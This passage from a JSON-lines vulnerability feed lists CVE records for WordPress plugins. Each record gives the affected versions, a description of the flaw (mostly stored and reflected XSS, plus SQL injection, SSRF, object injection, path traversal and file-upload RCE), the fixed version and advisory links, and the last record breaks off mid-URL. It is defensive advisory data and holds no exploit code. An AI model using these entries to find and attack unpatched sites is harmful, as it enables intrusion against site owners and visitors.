{"CVE_ID":"CVE-2023-5109","slug":"wp-mailto-links","versionImpact":"3.1.3","versionEndExcluding":"3.1.4","description":"The WP Mailto Links \u2013 Protect Email Addresses plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'wpml_mailto' shortcode in versions up to, and including, 3.1.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This was partially patched in version 3.1.3 and fully patched in version 3.1.4.","recommendation":"Update to version 3.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec882062-0059-47ca-a007-3347e7adb70b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec882062-0059-47ca-a007-3347e7adb70b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-mailto-links\\\/tags\\\/3.1.2\\\/core\\\/includes\\\/classes\\\/class-wp-mailto-links-validate.php#L582\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-mailto-links\\\/tags\\\/3.1.2\\\/core\\\/includes\\\/classes\\\/class-wp-mailto-links-validate.php#L582\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3901","slug":"genesis-blocks","versionImpact":"3.1.3","versionEndExcluding":"3.1.4","description":"The Genesis Blocks WordPress plugin through 3.1.3 does not properly escape attributes provided to some of its custom blocks, making it possible for users allowed to write posts (like those with the contributor role) to conduct Stored XSS attacks.","recommendation":"Update to version 3.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9502e1ac-346e-4431-90a6-61143d2df37b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9502e1ac-346e-4431-90a6-61143d2df37b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8867","slug":"graphina-elementor-charts-and-graphs","versionImpact":"3.1.3","versionEndExcluding":"3.1.4","description":"The Graphina - Elementor Charts and Graphs plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple chart widget parameters in version 3.1.3 and below. This is due to insufficient input sanitization and output escaping on user supplied attributes such as chart categories, titles, and tooltip settings. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/includes\\\/Charts\\\/Elementor\\\/Elements\\\/ApexCharts\\\/AreaChart.php#L156\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/includes\\\/Charts\\\/Elementor\\\/Elements\\\/ApexCharts\\\/AreaChart.php#L156\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/includes\\\/Charts\\\/Elementor\\\/Elements\\\/ApexCharts\\\/ColumnChart.php#L183\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/includes\\\/Charts\\\/Elementor\\\/Elements\\\/ApexCharts\\\/ColumnChart.php#L183\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/includes\\\/Charts\\\/Elementor\\\/Elements\\\/ApexCharts\\\/DistributeColumnChart.php#L179\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/includes\\\/Charts\\\/Elementor\\\/Elements\\\/ApexCharts\\\/DistributeColumnChart.php#L179\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/includes\\\/Charts\\\/Elementor\\\/Elements\\\/ApexCharts\\\/HeatmapChart.php#L173\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/includes\\\/Charts\\\/Elementor\\\/Elements\\\/ApexCharts\\\/HeatmapChart.php#L173\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/includes\\\/Charts\\\/Elementor\\\/Elements\\\/ApexCharts\\\/LineChart.php#L186\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/includes\\\/Charts\\\/Elementor\\\/Elements\\\/ApexCharts\\\/LineChart.php#L186\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/includes\\\/Charts\\\/Elementor\\\/Elements\\\/ApexCharts\\\/RadarChart.php#L182\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/includes\\\/Charts\\\/Elementor\\\/Elements\\\/ApexCharts\\\/RadarChart.php#L182\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/includes\\\/Charts\\\/Elementor\\\/Elements\\\/ApexCharts\\\/ScatterChart.php#L181\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/includes\\\/Charts\\\/Elementor\\\/Elements\\\/ApexCharts\\\/ScatterChart.php#L181\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/includes\\\/Charts\\\/Elementor\\\/Elements\\\/ApexCharts\\\/TimelineChart.php#L173\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/includes\\\/Charts\\\/Elementor\\\/Elements\\\/ApexCharts\\\/TimelineChart.php#L173\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3343408%40graphina-elementor-charts-and-graphs&new=3343408%40graphina-elementor-charts-and-graphs&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3343408%40graphina-elementor-charts-and-graphs&new=3343408%40graphina-elementor-charts-and-graphs&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ae7f76ef-3f97-4889-8902-f13a4a298475?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ae7f76ef-3f97-4889-8902-f13a4a298475?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3954","slug":"ditty-news-ticker","versionImpact":"3.1.38","versionEndExcluding":"3.1.39","description":"The Ditty plugin for WordPress is vulnerable to PHP Object Injection in all versions up to 3.1.38 via deserialization of untrusted input when adding a new ditty. This makes it possible for authenticated attackers, with contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 3.1.39, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f00b138-5c4b-4f75-94b1-82721cba2668?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f00b138-5c4b-4f75-94b1-82721cba2668?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3081335%40ditty-news-ticker&new=3081335%40ditty-news-ticker&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3081335%40ditty-news-ticker&new=3081335%40ditty-news-ticker&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4423","slug":"wp-event-manager","versionImpact":"3.1.37.1","versionEndExcluding":"3.1.38","description":"The WP Event Manager \u2013 Events Calendar, Registrations, Sell Tickets with WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in versions up to, and including, 3.1.37.1  due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 3.1.38, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd9d22b0-a84a-4bf2-b8b4-89bae2970f29?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd9d22b0-a84a-4bf2-b8b4-89bae2970f29?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/Jacky-Y\\\/vuls\\\/blob\\\/main\\\/vul5.md\",\"name\":\"https:\\\/\\\/github.com\\\/Jacky-Y\\\/vuls\\\/blob\\\/main\\\/vul5.md\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2969034%40wp-event-manager%2Ftrunk&old=2953169%40wp-event-manager%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2969034%40wp-event-manager%2Ftrunk&old=2953169%40wp-event-manager%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wpeventmanager\\\/wp-event-manager\\\/issues\\\/1483\",\"name\":\"https:\\\/\\\/github.com\\\/wpeventmanager\\\/wp-event-manager\\\/issues\\\/1483\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3939","slug":"ditty-news-ticker","versionImpact":"3.1.35","versionEndExcluding":"3.1.36","description":"The Ditty  WordPress plugin before 3.1.36 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 3.1.36, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/80a9eb3a-2cb1-4844-9004-ba2554b2d46c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/80a9eb3a-2cb1-4844-9004-ba2554b2d46c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3201","slug":"shapepress-dsgvo","versionImpact":"3.1.32","versionEndExcluding":"3.1.33","description":"The WP DSGVO Tools (GDPR) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'pp_link' shortcode in all versions up to, and including, 3.1.32 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.1.33, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/df5cd6e7-e821-403f-a048-25c2ca1fb2de?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/df5cd6e7-e821-403f-a048-25c2ca1fb2de?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3090019%40shapepress-dsgvo%2Ftrunk&old=3016389%40shapepress-dsgvo%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3090019%40shapepress-dsgvo%2Ftrunk&old=3016389%40shapepress-dsgvo%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12302","slug":"icegram","versionImpact":"3.1.31","versionEndExcluding":"3.1.32","description":"The Icegram Engage  WordPress plugin before 3.1.32 does not sanitise and escape some of its Campaign settings, which could allow authors and above to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 3.1.32, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ed860dac-8c4a-482f-8826-31f1a894b6ce\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ed860dac-8c4a-482f-8826-31f1a894b6ce\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13486","slug":"icegram","versionImpact":"3.1.31","versionEndExcluding":"3.1.32","description":"The Icegram Engage  WordPress plugin before 3.1.32 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.1.32, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cbba8346-41f6-46ee-89ae-ed9524d768ef\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cbba8346-41f6-46ee-89ae-ed9524d768ef\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13482","slug":"icegram","versionImpact":"3.1.31","versionEndExcluding":"3.1.32","description":"The Icegram Engage  WordPress plugin before 3.1.32 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.1.32, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/83ae33d0-4fc1-4186-9d70-b854a16df3a7\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/83ae33d0-4fc1-4186-9d70-b854a16df3a7\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1406","slug":"jet-engine","versionEndExcluding":"3.1.3.1","description":"The JetEngine WordPress plugin before 3.1.3.1 includes uploaded files without adequately ensuring that they are not executable, leading to a remote code execution vulnerability.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2a81b6b1-2339-4889-9c28-1af133df8b65\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2a81b6b1-2339-4889-9c28-1af133df8b65\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3650","slug":"elementskit-lite","versionImpact":"3.1.2","versionEndExcluding":"3.1.3","description":"The ElementsKit Elementor addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Image Accordion widget in all versions 3.0.7 through 3.1.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93dcbab7-fdf5-4631-8605-77f8f190512d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93dcbab7-fdf5-4631-8605-77f8f190512d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3078160\\\/elementskit-lite\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3078160\\\/elementskit-lite\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2016-15041","slug":"mainwp","versionEndExcluding":"3.1.3","description":"The MainWP Dashboard \u2013 The Private WordPress Manager for Multiple Website Maintenance plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018mwp_setup_purchase_username\u2019 parameter in versions up to, and including, 3.1.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a9b1445f-3b6b-40fa-9a12-f55d63668dda?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a9b1445f-3b6b-40fa-9a12-f55d63668dda?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/klikki.fi\\\/adv\\\/mainwp.html\",\"name\":\"https:\\\/\\\/klikki.fi\\\/adv\\\/mainwp.html\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-mainwp-dashboard-cross-site-scripting-3-1-2\\\/\",\"name\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-mainwp-dashboard-cross-site-scripting-3-1-2\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/web.archive.org\\\/web\\\/20191101060009\\\/https%3A\\\/\\\/klikki.fi\\\/adv\\\/mainwp.html\",\"name\":\"https:\\\/\\\/web.archive.org\\\/web\\\/20191101060009\\\/https%3A\\\/\\\/klikki.fi\\\/adv\\\/mainwp.html\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-32629","slug":"wp-businessdirectory","versionImpact":"3.1.2","versionEndExcluding":"3.1.3","description":"Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in CMSJunkie - WordPress Business Directory Plugins WP-BusinessDirectory allows Path Traversal. This issue affects WP-BusinessDirectory: from n\/a through 3.1.2.","recommendation":"Update to version 3.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-businessdirectory\\\/vulnerability\\\/wordpress-wp-businessdirectory-plugin-3-1-2-arbitrary-file-deletion-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-businessdirectory\\\/vulnerability\\\/wordpress-wp-businessdirectory-plugin-3-1-2-arbitrary-file-deletion-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-32630","slug":"wp-businessdirectory","versionImpact":"3.1.2","versionEndExcluding":"3.1.3","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CMSJunkie - WordPress Business Directory Plugins WP-BusinessDirectory allows Reflected XSS. This issue affects WP-BusinessDirectory: from n\/a through 3.1.2.","recommendation":"Update to version 3.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-businessdirectory\\\/vulnerability\\\/wordpress-wp-businessdirectory-plugin-3-1-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-businessdirectory\\\/vulnerability\\\/wordpress-wp-businessdirectory-plugin-3-1-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3775","slug":"woolentor-addons","versionImpact":"3.1.2","versionEndExcluding":"3.1.3","description":"The ShopLentor \u2013 WooCommerce Builder for Elementor & Gutenberg +20 Modules \u2013 All in One Solution (formerly WooLentor) plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 3.1.2 via the woolentor_template_proxy function. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application, and can be used to query and modify information from internal services.","recommendation":"Update to version 3.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woolentor-addons\\\/tags\\\/3.1.2\\\/includes\\\/admin-panel\\\/includes\\\/classes\\\/Admin.php#L71\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woolentor-addons\\\/tags\\\/3.1.2\\\/includes\\\/admin-panel\\\/includes\\\/classes\\\/Admin.php#L71\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4dfc28ec-1411-43c3-833e-a6c85a3ed767?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4dfc28ec-1411-43c3-833e-a6c85a3ed767?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2803","slug":"ultimate-addons-for-contact-form-7","versionEndExcluding":"3.1.29","description":"The Ultimate Addons for Contact Form 7 WordPress plugin before 3.1.29 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ec640d47-bb22-478d-9668-1dab72f12f8d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ec640d47-bb22-478d-9668-1dab72f12f8d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2802","slug":"ultimate-addons-for-contact-form-7","versionEndExcluding":"3.1.29","description":"The Ultimate Addons for Contact Form 7 WordPress plugin before 3.1.29 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c5cc136a-2fa6-44ff-b5b5-26d367937df9\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c5cc136a-2fa6-44ff-b5b5-26d367937df9\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12023","slug":"full-customer","versionImpact":"3.1.25","versionEndExcluding":"3.1.26","description":"The FULL \u2013 Cliente plugin for WordPress is vulnerable to SQL Injection via the 'formId' parameter in all versions 3.1.5 to 3.1.25 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. This is only exploitable when the PRO version of the plugin is activated, along with Elementor Pro and  Elementor CRM.","recommendation":"Update to version 3.1.26, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/3.1.25\\\/app\\\/controller\\\/elementor-crm\\\/Hooks.php#L181\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/3.1.25\\\/app\\\/controller\\\/elementor-crm\\\/Hooks.php#L181\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/3.1.26\\\/app\\\/controller\\\/elementor-crm\\\/Hooks.php#L181\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/3.1.26\\\/app\\\/controller\\\/elementor-crm\\\/Hooks.php#L181\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86e990ae-6bfe-4f2b-8c37-b0675430a638?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86e990ae-6bfe-4f2b-8c37-b0675430a638?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4148","slug":"ditty-news-ticker","versionEndExcluding":"3.1.25","description":"The Ditty WordPress plugin before 3.1.25 does not sanitise and escape some parameters and generated URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aa39de78-55b3-4237-84db-6fdf6820c58d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aa39de78-55b3-4237-84db-6fdf6820c58d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4358","slug":"shapepress-dsgvo","versionEndExcluding":"3.1.24","description":"The WP DSGVO Tools (GDPR) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via an unknown parameter in versions up to, and including, 3.1.23 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-wp-dsgvo-tools-gdpr-plugin-patched-vulnerability-actively-exploited\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-wp-dsgvo-tools-gdpr-plugin-patched-vulnerability-actively-exploited\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/support\\\/topic\\\/weiterleitung-redirects\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/support\\\/topic\\\/weiterleitung-redirects\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6c18ab1b-02f1-4679-8cff-679d98dc9f4a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6c18ab1b-02f1-4679-8cff-679d98dc9f4a?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9211","slug":"full-customer","versionImpact":"3.1.22","versionEndExcluding":"3.1.23","description":"The FULL \u2013 Cliente plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 3.1.22. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.1.23, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f62a486a-137b-48e5-b276-44438958e811?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f62a486a-137b-48e5-b276-44438958e811?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/3.1.22\\\/app\\\/views\\\/admin\\\/connection.php#L110\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/3.1.22\\\/app\\\/views\\\/admin\\\/connection.php#L110\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/3.1.22\\\/app\\\/views\\\/admin\\\/templates\\\/endpoints\\\/cloud.php#L7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/3.1.22\\\/app\\\/views\\\/admin\\\/templates\\\/endpoints\\\/cloud.php#L7\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/3.1.22\\\/app\\\/views\\\/admin\\\/config.php#L274\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/3.1.22\\\/app\\\/views\\\/admin\\\/config.php#L274\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/3.1.23\\\/app\\\/views\\\/admin\\\/config.php#L274\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/3.1.23\\\/app\\\/views\\\/admin\\\/config.php#L274\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/3.1.23\\\/app\\\/views\\\/admin\\\/templates\\\/endpoints\\